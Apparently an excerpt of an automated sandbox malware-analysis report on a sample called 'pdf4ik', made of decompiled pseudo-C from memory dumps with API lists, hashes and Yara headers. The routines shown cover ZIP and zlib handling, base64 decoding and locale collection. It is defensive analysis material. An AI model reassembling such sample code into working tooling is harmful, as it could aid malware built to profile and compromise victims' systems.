                                        														_t206 = _t204 >> 0x00000005 & 0x00000001;
                                        													} else {
                                        														__eflags = _t287 - 7;
                                        														if(_t287 == 7) {
                                        															goto L48;
                                        														} else {
                                        															__eflags = _t287 - 0xb;
                                        															if(_t287 == 0xb) {
                                        																goto L48;
                                        															} else {
                                        																__eflags = _t287 - 0xe;
                                        																if(_t287 != 0xe) {
                                        																	_t206 = _v562;
                                        																	_t296 = _v561;
                                        																} else {
                                        																	goto L48;
                                        																}
                                        															}
                                        														}
                                        													}
                                        													 *(_t274 + 0x108) = 0;
                                        													__eflags = _t296;
                                        													if(_t296 != 0) {
                                        														 *(_t274 + 0x108) = 0x10;
                                        													}
                                        													__eflags = _t206;
                                        													if(_t206 != 0) {
                                        														_t86 = _t274 + 0x108;
                                        														 *_t86 =  *(_t274 + 0x108) | 0x00000020;
                                        														__eflags =  *_t86;
                                        													}
                                        													__eflags = _v563;
                                        													if(_v563 != 0) {
                                        														_t89 = _t274 + 0x108;
                                        														 *_t89 =  *(_t274 + 0x108) | 0x00000002;
                                        														__eflags =  *_t89;
                                        													}
                                        													__eflags = _t349;
                                        													if(_t349 != 0) {
                                        														_t91 = _t274 + 0x108;
                                        														 *_t91 =  *(_t274 + 0x108) | 0x00000001;
                                        														__eflags =  *_t91;
                                        													}
                                        													__eflags = _v564;
                                        													if(_v564 != 0) {
                                        														_t94 = _t274 + 0x108;
                                        														 *_t94 =  *(_t274 + 0x108) | 0x00000004;
                                        														__eflags =  *_t94;
                                        													}
                                        													 *((intOrPtr*)(_t274 + 0x124)) = _v664;
                                        													 *((intOrPtr*)(_t274 + 0x128)) = _v660;
                                        													_t208 = _v672;
                                        													_t298 = _t208 >> 0x10;
                                        													_v560.wYear = (_t298 >> 9) + 0x7bc;
                                        													_v560.wMonth = _t298 >> 0x00000005 & 0x0000000f;
                                        													_v560.wDay = _t298 & 0x0000001f;
                                        													_v560.wHour = _t208 >> 0xb;
                                        													_v560.wMinute = _t208 >> 0x00000005 & 0x0000003f;
                                        													_v560.wSecond = (_t208 & 0x0000001f) + (_t208 & 0x0000001f);
                                        													_v560.wMilliseconds = 0;
                                        													SystemTimeToFileTime( &_v560,  &_v588);
                                        													_v604.dwLowDateTime = _v588.dwLowDateTime;
                                        													_v604.dwHighDateTime = _v588.dwHighDateTime;
                                        													LocalFileTimeToFileTime( &_v604,  &_v596);
                                        													_t216 = _v596.dwLowDateTime;
                                        													_t304 = _v596.dwHighDateTime;
                                        													_t384 = 0;
                                        													__eflags = _v572 - 4;
                                        													 *(_t274 + 0x10c) = _t216;
                                        													 *(_t274 + 0x110) = _t304;
                                        													 *(_t274 + 0x114) = _t216;
                                        													 *(_t274 + 0x118) = _t304;
                                        													 *(_t274 + 0x11c) = _t216;
                                        													 *(_t274 + 0x120) = _t304;
                                        													if(_v572 > 4) {
                                        														_v566 = 0;
                                        														do {
                                        															_v568 =  *((intOrPtr*)(_t384 + _t394));
                                        															_v567 =  *((intOrPtr*)(_t384 + 1 + _t394));
                                        															_t310 = "UT";
                                        															_t222 =  &_v568;
                                        															while(1) {
                                        																_t365 =  *_t222;
                                        																__eflags = _t365 -  *_t310;
                                        																if(_t365 !=  *_t310) {
                                        																	break;
                                        																}
                                        																__eflags = _t365;
                                        																if(_t365 == 0) {
                                        																	L67:
                                        																	_t222 = 0;
                                        																} else {
                                        																	_t375 =  *((intOrPtr*)(1 + _t222));
                                        																	_t133 = _t310 + 1; // 0x25000054
                                        																	__eflags = _t375 -  *_t133;
                                        																	if(_t375 !=  *_t133) {
                                        																		break;
                                        																	} else {
                                        																		_t222 = _t222 + 2;
                                        																		_t310 = _t310 + 2;
                                        																		__eflags = _t375;
                                        																		if(_t375 != 0) {
                                        																			continue;
                                        																		} else {
                                        																			goto L67;
                                        																		}
                                        																	}
                                        																}
                                        																L69:
                                        																__eflags = _t222;
                                        																if(_t222 == 0) {
                                        																	_t223 =  *(_t384 + _t394 + 4) & 0x000000ff;
                                        																	_t389 = _t384 + 5;
                                        																	_v561 = _t223 >> 0x00000001 & 0x00000001;
                                        																	_v562 = _t223 >> 0x00000002 & 0x00000001;
                                        																	__eflags = _t223 & 0x00000001;
                                        																	if((_t223 & 0x00000001) != 0) {
                                        																		_t374 =  *(_t389 + _t394) & 0x000000ff;
                                        																		_t248 = ((( *(_t389 + _t394 + 3) & 0x000000ff) << 0x00000008 |  *(_t389 + _t394 + 2) & 0x000000ff) << 0x00000008 |  *(_t389 + 1 + _t394) & 0x000000ff) << 0x00000008 | _t374;
                                        																		asm("cdq");
                                        																		_t389 = _t389 + 4;
                                        																		__eflags = _t248 + 0xb6109100;
                                        																		asm("adc edx, 0x2");
                                        																		 *(_t274 + 0x11c) = E29DBC6C0(_t248 + 0xb6109100, _t374, 0x989680, 0);
                                        																		 *(_t274 + 0x120) = _t374;
                                        																	}
                                        																	__eflags = _v561;
                                        																	if(_v561 != 0) {
                                        																		_t372 =  *(_t389 + _t394) & 0x000000ff;
                                        																		_t239 = ((( *(_t389 + _t394 + 3) & 0x000000ff) << 0x00000008 |  *(_t389 + _t394 + 2) & 0x000000ff) << 0x00000008 |  *(_t389 + 1 + _t394) & 0x000000ff) << 0x00000008 | _t372;
                                        																		asm("cdq");
                                        																		_t389 = _t389 + 4;
                                        																		__eflags = _t239 + 0xb6109100;
                                        																		asm("adc edx, 0x2");
                                        																		 *(_t274 + 0x10c) = E29DBC6C0(_t239 + 0xb6109100, _t372, 0x989680, 0);
                                        																		 *(_t274 + 0x110) = _t372;
                                        																	}
                                        																	__eflags = _v562;
                                        																	if(_v562 != 0) {
                                        																		_t370 =  *(_t389 + _t394) & 0x000000ff;
                                        																		asm("cdq");
                                        																		__eflags = (((( *(_t389 + _t394 + 3) & 0x000000ff) << 0x00000008 |  *(_t389 + _t394 + 2) & 0x000000ff) << 0x00000008 |  *(_t389 + 1 + _t394) & 0x000000ff) << 0x00000008 | _t370) + 0xb6109100;
                                        																		asm("adc edx, 0x2");
                                        																		 *(_t274 + 0x114) = E29DBC6C0((((( *(_t389 + _t394 + 3) & 0x000000ff) << 0x00000008 |  *(_t389 + _t394 + 2) & 0x000000ff) << 0x00000008 |  *(_t389 + 1 + _t394) & 0x000000ff) << 0x00000008 | _t370) + 0xb6109100, _t370, 0x989680, 0);
                                        																		 *(_t274 + 0x118) = _t370;
                                        																	}
                                        																} else {
                                        																	goto L70;
                                        																}
                                        																goto L78;
                                        															}
                                        															asm("sbb eax, eax");
                                        															asm("sbb eax, 0xffffffff");
                                        															goto L69;
                                        															L70:
                                        															_t384 = _t384 + ( *(_t384 + _t394 + 2) & 0x000000ff) + 4;
                                        															__eflags = _t384 + 4 - _v572;
                                        														} while (_t384 + 4 < _v572);
                                        													}
                                        													L78:
                                        													__eflags = _t394;
                                        													if(_t394 != 0) {
                                        														_push(_t394);
                                        														E29DAEA83();
                                        														_t402 = _t402 + 4;
                                        													}
                                        													 *((intOrPtr*)(memcpy(_v576 + 8, _t274, 0x4b << 2) + 0x134)) = _a4;
                                        													__eflags = _v12 ^ _t397;
                                        													return E29DADF46(0, _t274, _v12 ^ _t397, _a4, _t274 + 0x96, _t274);
                                        													goto L82;
                                        												}
                                        											} else {
                                        												_push(_t394);
                                        												E29DAEA83();
                                        												goto L25;
                                        											}
                                        										}
                                        									}
                                        								} else {
                                        									__eflags = _v12 ^ _t397;
                                        									return E29DADF46(0x700, _t273, _v12 ^ _t397,  &_v572, _t380, _t394);
                                        								}
                                        							} else {
                                        								goto L8;
                                        							}
                                        						} else {
                                        							if(_t184 == 0xffffffff) {
                                        								L8:
                                        								 *_t393 =  *((intOrPtr*)( *_t273 + 4));
                                        								 *((char*)(_t393 + 4)) = 0;
                                        								 *((intOrPtr*)(_t393 + 0x108)) = 0;
                                        								 *((intOrPtr*)(_t393 + 0x10c)) = 0;
                                        								 *((intOrPtr*)(_t393 + 0x110)) = 0;
                                        								 *((intOrPtr*)(_t393 + 0x114)) = 0;
                                        								 *((intOrPtr*)(_t393 + 0x118)) = 0;
                                        								 *((intOrPtr*)(_t393 + 0x11c)) = 0;
                                        								 *((intOrPtr*)(_t393 + 0x120)) = 0;
                                        								 *((intOrPtr*)(_t393 + 0x124)) = 0;
                                        								 *((intOrPtr*)(_t393 + 0x128)) = 0;
                                        								__eflags = _v12 ^ _t397;
                                        								return E29DADF46(0, _t273, _v12 ^ _t397, _t341, _t379, _t393);
                                        							} else {
                                        								memcpy(_v580,  &(_t273[2]), 0x4b << 2);
                                        								return E29DADF46(0, _t273, _v12 ^ _t397, _t341,  &(_t273[0x27]),  &(_t273[2]));
                                        							}
                                        						}
                                        					}
                                        				}
                                        				L82:
                                        			}

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: /../$/..\$\../$\..\
                                        • API String ID: 0-3885502717
                                        • Opcode ID: 502b6626edd748fd79d1806f33c56f0d675780aa630f3d8e093e2712fc96fa36
                                        • Instruction ID: 8d56c0f29fa1f9e6326d2610230fae3cc97c25bb970a6d527841d52e6206e6b4
                                        • Opcode Fuzzy Hash: 502b6626edd748fd79d1806f33c56f0d675780aa630f3d8e093e2712fc96fa36
                                        • Instruction Fuzzy Hash: 04123A719002549FCB18CF28C884BE9B7F5FF99300F1485EDD94A9B682D735AA87DB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 45%
                                        			E29D98FB0(CHAR* __ecx) {
                                        				signed int _v8;
                                        				char _v8104;
                                        				int _v8108;
                                        				CHAR* _v8112;
                                        				CHAR* _v8116;
                                        				char _v8120;
                                        				int _v8124;
                                        				BYTE* _v8128;
                                        				char _v8132;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t25;
                                        				void* _t35;
                                        				void* _t42;
                                        				void* _t47;
                                        				void* _t48;
                                        				void* _t49;
                                        				void* _t50;
                                        				CHAR* _t65;
                                        				intOrPtr _t66;
                                        				signed int _t67;
                                        				void* _t68;
                                        				void* _t69;
                                        				void* _t70;
                                        
                                        				E29DBCDB0(0x1fc0);
                                        				_t25 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t25 ^ _t67;
                                        				_t65 = __ecx;
                                        				_v8108 = 0x1fa0;
                                        				E29DB5640( &_v8104, 0, 0x1fa0);
                                        				_t69 = _t68 + 0xc;
                                        				_t61 =  &_v8104;
                                        				if(CryptStringToBinaryA(_t65, lstrlenA(_t65), 1,  &_v8104,  &_v8108, 0, 0) == 0) {
                                        					L7:
                                        					return E29DADF46(0x29dcd617, _t47, _v8 ^ _t67, _t61, 0x29dcd617, _t65);
                                        				} else {
                                        					_t48 =  *0x29dd82fc(_t47);
                                        					_t65 = 0;
                                        					if(_t48 == 0) {
                                        						lstrcatA(0x29dcd617, 0x29dcd617);
                                        						_pop(_t47);
                                        						goto L7;
                                        					} else {
                                        						_t35 =  *0x29dd8340(_t48, 1, 0);
                                        						_t70 = _t69 + 0xc;
                                        						if(_t35 != 0) {
                                        							L5:
                                        							lstrcatA(0x29dcd617, 0x29dcd617);
                                        							 *0x29dd8324();
                                        							_t49 = _t48;
                                        							return E29DADF46(0x29dcd617, _t49, _v8 ^ _t67, _t61, 0x29dcd617, _t65);
                                        						} else {
                                        							_t61 =  &_v8120;
                                        							_v8128 =  &_v8104;
                                        							_v8124 = _v8108;
                                        							_v8116 = 0;
                                        							_v8112 = 0;
                                        							_t42 =  *0x29dd831c( &_v8132,  &_v8120, 0);
                                        							_t70 = _t70 + 0xc;
                                        							if(_t42 != 0) {
                                        								goto L5;
                                        							} else {
                                        								_t66 = _v8112;
                                        								E29DB0010( &_v8104, _v8116, _t66);
                                        								 *((char*)(_t67 + _t66 - 0x1fa4)) = 0;
                                        								 *0x29dd8324();
                                        								_t50 = _t48;
                                        								return E29DADF46( &_v8104, _t50, _v8 ^ _t67,  &_v8104,  &_v8104, _t66);
                                        							}
                                        						}
                                        					}
                                        				}
                                        			}





























                                        APIs
                                        • _memset.LIBCMT ref: 29D98FE8
                                        • lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,29D9ABE7,?,?,?,29DCD617,?), ref: 29D99005
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 29D9900D
                                        • _memmove.LIBCMT ref: 29D99098
                                        • lstrcatA.KERNEL32(29DCD617,29DCD617,?,00000000,00000000,?,?,29D9ABE7,?,?,?,29DCD617,?), ref: 29D990D5
                                        • lstrcatA.KERNEL32(29DCD617,29DCD617,?,00000000,?,00000001,?,?,00000000,00000000,?,?,29D9ABE7), ref: 29D99102
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$BinaryCryptString_memmove_memsetlstrlen
                                        • String ID:
                                        • API String ID: 943939369-0
                                        • Opcode ID: f6e4f95a7e1f13faa30a4ffc92f88969ca9cdba25140e2fd23661525565cc47f
                                        • Instruction ID: a0ac1a8cf55649aba4953bbb728eac2bd14c2a03c32db4707c3ffb754903344d
                                        • Opcode Fuzzy Hash: f6e4f95a7e1f13faa30a4ffc92f88969ca9cdba25140e2fd23661525565cc47f
                                        • Instruction Fuzzy Hash: 6E31D5B2A00119ABCB10AB54ED84EEEB7B8EF48701F4440F9F90ED7244DB755A46DFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29DB94F9(void* __edi, char* __esi) {
                                        				short _v8;
                                        				void* _t24;
                                        
                                        				_t24 = __edi;
                                        				if(__esi == 0 ||  *__esi == 0 || E29DB3020(__esi, ?str?) == 0) {
                                        					if(GetLocaleInfoW( *(_t24 + 0x1c), 0x20001004,  &_v8, 2) != 0) {
                                        						if(_v8 != 0) {
                                        							goto L5;
                                        						} else {
                                        							return GetACP();
                                        						}
                                        					} else {
                                        						goto L8;
                                        					}
                                        				} else {
                                        					if(E29DB3020(__esi, ?str?) != 0) {
                                        						_v8 = E29DAEC1D(__esi);
                                        						goto L5;
                                        					} else {
                                        						if(GetLocaleInfoW( *(__edi + 0x1c), 0x2000000b,  &_v8, 2) == 0) {
                                        							L8:
                                        							return 0;
                                        						} else {
                                        							L5:
                                        							return _v8;
                                        						}
                                        					}
                                        				}
                                        			}






                                        APIs
                                        • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,29DB9B36,?,29DB0DC5,?,000000BC,?,00000001,00000000,00000000), ref: 29DB9538
                                        • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,29DB9B36,?,29DB0DC5,?,000000BC,?,00000001,00000000,00000000), ref: 29DB9561
                                        • GetACP.KERNEL32(?,?,29DB9B36,?,29DB0DC5,?,000000BC,?,00000001,00000000), ref: 29DB9575
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID: ACP$OCP
                                        • API String ID: 2299586839-711371036
                                        • Opcode ID: f8edce63b29506c62e335a06d6e29d3e46749d3719c630122a8da3a475e467f8
                                        • Instruction ID: 4d56ce8b670b8836da622cabd5eba872b286253ddc51b3e778938b6bfcec03f5
                                        • Opcode Fuzzy Hash: f8edce63b29506c62e335a06d6e29d3e46749d3719c630122a8da3a475e467f8
                                        • Instruction Fuzzy Hash: 7101D47154568ABBEB059B60EC15B5E77E8AF1065CF10805DE103EA881DB30CB43B754
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 76%
                                        			E29DA3A68(void* __ebx, void* __edi, signed int __esi) {
                                        				void* _t22;
                                        				void* _t23;
                                        				void* _t29;
                                        				void* _t30;
                                        				signed int _t31;
                                        				void* _t32;
                                        				signed int _t33;
                                        				void* _t35;
                                        				void* _t36;
                                        
                                        				_t31 = __esi;
                                        				_t29 = __edi;
                                        				_t22 = __ebx;
                                        				do {
                                        					_t28 =  *(_t22 + _t31 * 4) & 0x0000ffff;
                                        					GetLocaleInfoA( *(_t22 + _t31 * 4) & 0x0000ffff, 2, _t33 - 0x204, 0x200);
                                        					if(_t29 == 0) {
                                        						_t28 =  *(_t33 - 0x208);
                                        						wsprintfA( *(_t33 - 0x208), "%s", _t33 - 0x204);
                                        						_t36 = _t35 + 0xc;
                                        					} else {
                                        						wsprintfA( *(_t33 - 0x208), "%s / %s",  *(_t33 - 0x208), _t33 - 0x204);
                                        						_t36 = _t35 + 0x10;
                                        					}
                                        					_t29 = _t29 + 1;
                                        					E29DB5640(_t33 - 0x204, 0, 0x200);
                                        					_t31 = _t31 + 1;
                                        					_t35 = _t36 + 0xc;
                                        				} while (_t31 <  *((intOrPtr*)(_t33 - 0x20c)));
                                        				if(_t22 != 0) {
                                        					LocalFree(_t22);
                                        				}
                                        				_pop(_t30);
                                        				_pop(_t32);
                                        				_pop(_t23);
                                        				return E29DADF46( *(_t33 - 0x208), _t23,  *(_t33 - 4) ^ _t33, _t28, _t30, _t32);
                                        			}













                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wsprintf$FreeInfoLocalLocale_memset
                                        • String ID: %s / %s
                                        • API String ID: 3205847202-2910687431
                                        • Opcode ID: d62646763f4637ab28509b1a6afcec14dbf33029a74727cf9df6e1c41ffe5f27
                                        • Instruction ID: 55f4a4959f2e784ef4b459fba2c65702fd6b9794884d6f9be777489059fc49c3
                                        • Opcode Fuzzy Hash: d62646763f4637ab28509b1a6afcec14dbf33029a74727cf9df6e1c41ffe5f27
                                        • Instruction Fuzzy Hash: 9801DB76940324ABD710EB94DCC9FEEB37CEF44701F0041D9FA5AA2181DB319A519A61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 91%
                                        			E29D8A7A0(unsigned int* __eax, signed int* __ecx, unsigned int _a4) {
                                        				unsigned int _v8;
                                        				unsigned int _v12;
                                        				unsigned int _v16;
                                        				unsigned int _v20;
                                        				unsigned int _v24;
                                        				unsigned int _v28;
                                        				unsigned int _v32;
                                        				unsigned int _v36;
                                        				unsigned int _v40;
                                        				unsigned int _v44;
                                        				unsigned int _v48;
                                        				unsigned int _t399;
                                        				unsigned int* _t405;
                                        				intOrPtr _t408;
                                        				unsigned int _t410;
                                        				signed int _t411;
                                        				unsigned int _t423;
                                        				unsigned int _t424;
                                        				signed int _t434;
                                        				signed int* _t438;
                                        
                                        				_t405 = __eax;
                                        				_t438 = __ecx;
                                        				_t423 =  *((intOrPtr*)(__ecx + 0x34));
                                        				_v16 =  *((intOrPtr*)(__eax + 4));
                                        				_t408 =  *((intOrPtr*)(__ecx + 0x30));
                                        				_v12 =  *((intOrPtr*)(__eax));
                                        				_t399 =  *(__ecx + 0x20);
                                        				_t434 =  *(__ecx + 0x1c);
                                        				_v8 = _t399;
                                        				_v20 = _t423;
                                        				if(_t423 >= _t408) {
                                        					_t410 =  *((intOrPtr*)(__ecx + 0x2c)) - _t423;
                                        					_t424 = 1;
                                        				} else {
                                        					_t424 = 1;
                                        					_t410 = _t408 - _t423 - 1;
                                        				}
                                        				_v28 = _t410;
                                        				_t411 =  *_t438;
                                        				if(_t411 > 9) {
                                        					L96:
                                        					_push(0xfffffffe);
                                        					goto L97;
                                        				} else {
                                        					do {
                                        						switch( *((intOrPtr*)(_t411 * 4 +  &M29D8B114))) {
                                        							case 0:
                                        								if(_t434 >= 3) {
                                        									L8:
                                        									_t416 = _t399 & 0x00000007;
                                        									_t417 = _t416 >> 1;
                                        									_t438[6] = _t416 & 0x00000001;
                                        									if(_t417 > 3) {
                                        										goto L94;
                                        									} else {
                                        										switch( *((intOrPtr*)(_t417 * 4 +  &M29D8B13C))) {
                                        											case 0:
                                        												goto L10;
                                        											case 1:
                                        												goto L11;
                                        											case 2:
                                        												goto L13;
                                        											case 3:
                                        												goto L103;
                                        										}
                                        									}
                                        								} else {
                                        									while(_v16 != 0) {
                                        										_v16 = _v16 - _t424;
                                        										_t432 = ( *_v12 & 0x000000ff) << _t434;
                                        										_t434 = _t434 + 8;
                                        										_a4 = 0;
                                        										_t399 = _t399 | _t432;
                                        										_t424 = 1;
                                        										_v12 = _v12 + 1;
                                        										_v8 = _t399;
                                        										if(_t434 < 3) {
                                        											continue;
                                        										} else {
                                        											goto L8;
                                        										}
                                        										goto L124;
                                        									}
                                        									goto L100;
                                        								}
                                        								goto L124;
                                        							case 1:
                                        								__eflags = __edi - 0x20;
                                        								if(__edi >= 0x20) {
                                        									L17:
                                        									__ecx = __eax;
                                        									__eax =  !__eax;
                                        									__ecx = __ecx & 0x0000ffff;
                                        									__eax = __eax >> 0x10;
                                        									__eflags = __eax - __ecx;
                                        									if(__eax != __ecx) {
                                        										 *__esi = 9;
                                        										 *(__ebx + 0x18) = "invalid stored block lengths";
                                        										_push(0xfffffffd);
                                        										goto L97;
                                        									} else {
                                        										__eax = 0;
                                        										__edi = 0;
                                        										 *(__esi + 4) = __ecx;
                                        										_v8 = 0;
                                        										__eflags = __ecx;
                                        										if(__ecx == 0) {
                                        											 *(__esi + 0x18) =  ~( *(__esi + 0x18));
                                        											asm("sbb ecx, ecx");
                                        											__ecx =  ~( *(__esi + 0x18)) & 0x00000007;
                                        											 *__esi =  ~( *(__esi + 0x18)) & 0x00000007;
                                        										} else {
                                        											__ecx = 2;
                                        											 *__esi = 2;
                                        										}
                                        										goto L95;
                                        									}
                                        								} else {
                                        									while(1) {
                                        										__eflags = _v16;
                                        										if(_v16 == 0) {
                                        											goto L104;
                                        										}
                                        										_v16 = _v16 - __edx;
                                        										__ecx = _v12;
                                        										__edx =  *_v12 & 0x000000ff;
                                        										__ecx = __edi;
                                        										__edx = ( *_v12 & 0x000000ff) << __cl;
                                        										__edi = __edi + 8;
                                        										_a4 = 0;
                                        										__eax = __eax | ( *_v12 & 0x000000ff) << __cl;
                                        										__edx = 1;
                                        										_v12 = _v12 + 1;
                                        										_v8 = __eax;
                                        										__eflags = __edi - 0x20;
                                        										if(__edi < 0x20) {
                                        											continue;
                                        										} else {
                                        											goto L17;
                                        										}
                                        										goto L124;
                                        									}
                                        									goto L104;
                                        								}
                                        								goto L124;
                                        							case 2:
                                        								__eflags = _v16;
                                        								if(_v16 == 0) {
                                        									L104:
                                        									__eax = _v8;
                                        									 *(__esi + 0x20) = _v8;
                                        									goto L101;
                                        								} else {
                                        									__eflags = _v28;
                                        									if(_v28 != 0) {
                                        										L38:
                                        										__eax =  *(__esi + 4);
                                        										__ecx = _v16;
                                        										_a4 = 0;
                                        										_v24 = __eax;
                                        										__eflags = __eax - __ecx;
                                        										if(__eax > __ecx) {
                                        											__eax = __ecx;
                                        											_v24 = __ecx;
                                        										}
                                        										__ecx = _v28;
                                        										__eflags = __eax - __ecx;
                                        										if(__eax > __ecx) {
                                        											_v24 = __ecx;
                                        										}
                                        										__edx = _v24;
                                        										__eax = _v12;
                                        										__ecx = _v20;
                                        										__eax = E29DB0010(_v20, _v12, _v24);
                                        										__eax = _v24;
                                        										_v12 = _v12 + __eax;
                                        										_v16 = _v16 - __eax;
                                        										_v20 = _v20 + __eax;
                                        										_v28 = _v28 - __eax;
                                        										_t85 = __esi + 4;
                                        										 *_t85 =  *(__esi + 4) - __eax;
                                        										__eflags =  *_t85;
                                        										__eax = _v8;
                                        										if( *_t85 == 0) {
                                        											 *(__esi + 0x18) =  ~( *(__esi + 0x18));
                                        											asm("sbb edx, edx");
                                        											__edx =  ~( *(__esi + 0x18)) & 0x00000007;
                                        											 *__esi = __edx;
                                        										}
                                        										goto L94;
                                        									} else {
                                        										__edx =  *(__esi + 0x2c);
                                        										__eflags = _v20 - __edx;
                                        										if(_v20 != __edx) {
                                        											L29:
                                        											__ecx = _a4;
                                        											__eax = _v20;
                                        											 *(__esi + 0x34) = _v20;
                                        											__eax = E29D89EF0(__ebx, __esi, _a4);
                                        											__ecx =  *(__esi + 0x30);
                                        											_a4 = __eax;
                                        											__eax =  *(__esi + 0x34);
                                        											_v20 = __eax;
                                        											__eflags = __eax - __ecx;
                                        											if(__eax >= __ecx) {
                                        												__edx =  *(__esi + 0x2c);
                                        												__edx =  *(__esi + 0x2c) - __eax;
                                        												__eflags = __edx;
                                        											} else {
                                        												__ecx = __ecx - __eax;
                                        												__edx = __ecx - __eax - 1;
                                        											}
                                        											__eax =  *(__esi + 0x2c);
                                        											_v28 = __edx;
                                        											__eflags = _v20 - __eax;
                                        											if(_v20 == __eax) {
                                        												__edx =  *(__esi + 0x28);
                                        												__eflags = __edx - __ecx;
                                        												if(__eflags != 0) {
                                        													_v20 = __edx;
                                        													if(__eflags >= 0) {
                                        														__eax = __eax - __edx;
                                        														__eflags = __eax;
                                        														_v28 = __eax;
                                        													} else {
                                        														__ecx = __ecx - __edx;
                                        														_v28 = __ecx;
                                        													}
                                        												}
                                        											}
                                        											__eflags = _v28;
                                        											if(_v28 == 0) {
                                        												__ecx = _v8;
                                        												__eax = _v12;
                                        												__edx = _v16;
                                        												 *(__esi + 0x20) = _v8;
                                        												 *(__esi + 0x1c) = __edi;
                                        												 *__ebx = __eax;
                                        												__eax = _a4;
                                        												 *(__ebx + 4) = _v16;
                                        												_push(_a4);
                                        												goto L99;
                                        											} else {
                                        												goto L38;
                                        											}
                                        										} else {
                                        											__eax =  *(__esi + 0x30);
                                        											__ecx =  *(__esi + 0x28);
                                        											__eflags = __ecx - __eax;
                                        											if(__eflags == 0) {
                                        												goto L29;
                                        											} else {
                                        												_v20 = __ecx;
                                        												if(__eflags >= 0) {
                                        													__edx = __edx - __ecx;
                                        													__eflags = __edx;
                                        													__eax = __edx;
                                        													_v28 = __edx;
                                        												} else {
                                        													__eax = __eax - __ecx;
                                        													__eax = __eax - 1;
                                        													_v28 = __eax;
                                        												}
                                        												__eflags = __eax;
                                        												if(__eax != 0) {
                                        													goto L38;
                                        												} else {
                                        													goto L29;
                                        												}
                                        											}
                                        										}
                                        									}
                                        								}
                                        								goto L124;
                                        							case 3:
                                        								__eflags = __edi - 0xe;
                                        								if(__edi >= 0xe) {
                                        									L47:
                                        									__eax = __eax & 0x00003fff;
                                        									__ecx = __eax;
                                        									__ecx = __eax & 0x0000001f;
                                        									 *(__esi + 4) = __eax;
                                        									__eflags = __ecx - 0x1d;
                                        									if(__ecx > 0x1d) {
                                        										L109:
                                        										 *__esi = 9;
                                        										 *(__ebx + 0x18) = "too many length or distance symbols";
                                        										goto L110;
                                        									} else {
                                        										__eax = __eax >> 5;
                                        										__eax = __eax & 0x0000001f;
                                        										__eflags = __eax - 0x1d;
                                        										if(__eax > 0x1d) {
                                        											goto L109;
                                        										} else {
                                        											__edx =  *(__ebx + 0x20);
                                        											__eax = __eax + __ecx + 0x102;
                                        											__ecx =  *(__ebx + 0x28);
                                        											_push(4);
                                        											_push(__eax);
                                        											_push( *(__ebx + 0x28));
                                        											__eax =  *( *(__ebx + 0x20))();
                                        											__esp = __esp + 0xc;
                                        											 *(__esi + 0xc) = __eax;
                                        											__eflags = __eax;
                                        											if(__eax == 0) {
                                        												goto L108;
                                        											} else {
                                        												_v8 = _v8 >> 0xe;
                                        												__eax = _v8;
                                        												__edi = __edi - 0xe;
                                        												__eflags = __edi;
                                        												 *(__esi + 8) = 0;
                                        												 *__esi = 4;
                                        												__edx = 1;
                                        												goto L51;
                                        											}
                                        										}
                                        									}
                                        								} else {
                                        									while(1) {
                                        										__eflags = _v16;
                                        										if(_v16 == 0) {
                                        											goto L107;
                                        										}
                                        										_v16 = _v16 - __edx;
                                        										__ecx = _v12;
                                        										__edx =  *_v12 & 0x000000ff;
                                        										__ecx = __edi;
                                        										__edx = ( *_v12 & 0x000000ff) << __cl;
                                        										__edi = __edi + 8;
                                        										_a4 = 0;
                                        										__eax = __eax | ( *_v12 & 0x000000ff) << __cl;
                                        										__edx = 1;
                                        										_v12 = _v12 + 1;
                                        										_v8 = __eax;
                                        										__eflags = __edi - 0xe;
                                        										if(__edi < 0xe) {
                                        											continue;
                                        										} else {
                                        											goto L47;
                                        										}
                                        										goto L124;
                                        									}
                                        									goto L107;
                                        								}
                                        								goto L124;
                                        							case 4:
                                        								L51:
                                        								 *(__esi + 4) =  *(__esi + 4) >> 0xa;
                                        								__ecx = ( *(__esi + 4) >> 0xa) + 4;
                                        								__eflags =  *(__esi + 8) - ( *(__esi + 4) >> 0xa) + 4;
                                        								if( *(__esi + 8) >= ( *(__esi + 4) >> 0xa) + 4) {
                                        									L56:
                                        									__eax = 0x13;
                                        									__eflags =  *(__esi + 8) - 0x13;
                                        									while( *(__esi + 8) < 0x13) {
                                        										__edx =  *(__esi + 8);
                                        										__ecx =  *(0x29dcf0a0 +  *(__esi + 8) * 4);
                                        										__edx =  *(__esi + 0xc);
                                        										 *( *(__esi + 0xc) +  *(0x29dcf0a0 +  *(__esi + 8) * 4) * 4) = 0;
                                        										 *(__esi + 8) =  *(__esi + 8) + 1;
